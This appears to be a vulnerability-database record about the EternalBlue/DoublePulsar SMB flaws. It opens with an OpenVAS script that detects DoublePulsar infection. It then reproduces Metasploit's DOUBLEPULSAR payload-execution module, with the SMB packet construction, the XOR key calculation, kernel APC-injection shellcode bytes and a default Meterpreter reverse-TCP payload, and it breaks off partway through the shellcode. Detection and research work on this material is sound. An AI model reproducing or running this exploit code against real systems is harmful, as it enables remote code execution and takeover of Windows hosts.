2017-06-28Fixed the validation issues.\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; 
you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810698\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-0146\", \"CVE-2017-0147\");\n script_bugtraq_id(96707, 96709);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 15:25:17 +0530 (Tue, 18 Apr 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_name(\"Double Pulsar Infection Detect\");\n\n script_tag(name:\"summary\", value:\"This host is vulnerable to 'Eternalblue'\n tool attack and is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an SMB trans2 session setup request\n and check for presence of Multiplex ID '0x51' in the response.\");\n\n script_tag(name:\"insight\", value:\"An SMBv1 (Server Message Block 1.0) exploit\n that could trigger a RCE in older versions of Windows dubbed as 'ETERNALBLUE'\n has been discovered in latest dump of NSA Tools. 
One covert channel, 'double\n pulsar', is designed to particular for systems that are vulnerable to Eternalblue.\n The covert channel uses SMB features that have so far been not used, in\n particular, the 'Trans2' feature.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on the affected system. Failed attacks\n will cause denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"All Windows Platforms from Windows XP\n through Windows 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://github.com/countercept/doublepulsar-detection-script\");\n script_xref(name:\"URL\", value:\"https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312\");\n script_xref(name:\"URL\", value:\"http://blog.binaryedge.io/2017/04/21/doublepulsar\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x53, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\n## SMB Negotiate Protocol Response\nsend( socket:soc, data:smb_neg_req );\nsmb_neg_resp = smb_recv( socket:soc );\nif(strlen(smb_neg_resp) < 9 || !ord(smb_neg_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n\n## SMB Session Setup AndX Request,Anonymous User\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe,\n 0x00, 0x00, 0x40, 0x00, 0x0d, 0xff, 0x00, 0x88,\n 0x00, 0x04, 0x11, 0x0a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0xd4, 0x00, 0x00, 0x00, 0x4b,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x57, 0x00,\n 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00,\n 0x77, 0x00, 0x73, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x30, 0x00, 0x30, 0x00, 0x30, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x31, 0x00, 0x39, 0x00, 0x35, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 
0x00, 0x30, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x30, 0x00, 0x00, 0x00);\n\n## Session Setup AndX Response\nsend( socket:soc, data:smb_sess_req );\nsmb_sess_resp = smb_recv( socket:soc );\nif(strlen(smb_sess_resp) < 9 || !ord(smb_sess_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(strlen(smb_tree_resp) < 9 || !ord(smb_tree_resp[9])==0)\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\n\n## SMB TRANS2 Request\nsmbtrans2_request = raw_string(0x00, 0x00, 0x00, 0x4e, 0xff, 0x53, 0x4d, 0x42,\n 0x32, 0x00, 0x00, 0x00, 0x00, 0x18, 0x07, 0xc0,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00) + raw_string(tid_low, tid_high) +\n raw_string(0xff, 0xfe) + raw_string(uid_low, uid_high) +\n raw_string(0x41, 0x00, 0x0f, 0x0c, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xa6, 0xd9, 0xa4, 0x00, 0x00, 0x00, 0x0c,\n 0x00, 0x42, 0x00, 0x00, 0x00, 0x4e, 0x00, 0x01,\n 0x00, 0x0e, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && 
ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "packetstorm": [{"id": "PACKETSTORM:154690", "hash": "fc8b72378cefabde943e1894796310be", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR Payload Execution / Neutralization", "description": "", "published": "2019-10-01T00:00:00", "modified": "2019-10-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "reporter": "Luke Jennings", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-10-02T22:58:30", "history": [], "viewCount": 161, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", 
"idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-10-02T22:58:30", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2019-10-02T22:58:30", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/154690/doublepulsar_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude 
Msf::Exploit::Remote::SMB::Client \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload', {}], \n['Neutralize implant', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Notes' => { 
\n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n} \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n} \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack('V').first \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nvprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' 
\n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nvprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nvprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nvprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n 
\ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 
\npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" + \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" + \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" + \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" 
+ \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" + \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" + \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" + \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" + \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" + \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" + \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" + \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" + \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" + \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" + \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" + \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" + \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" + \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" + \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" + \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" + \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" + \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" + 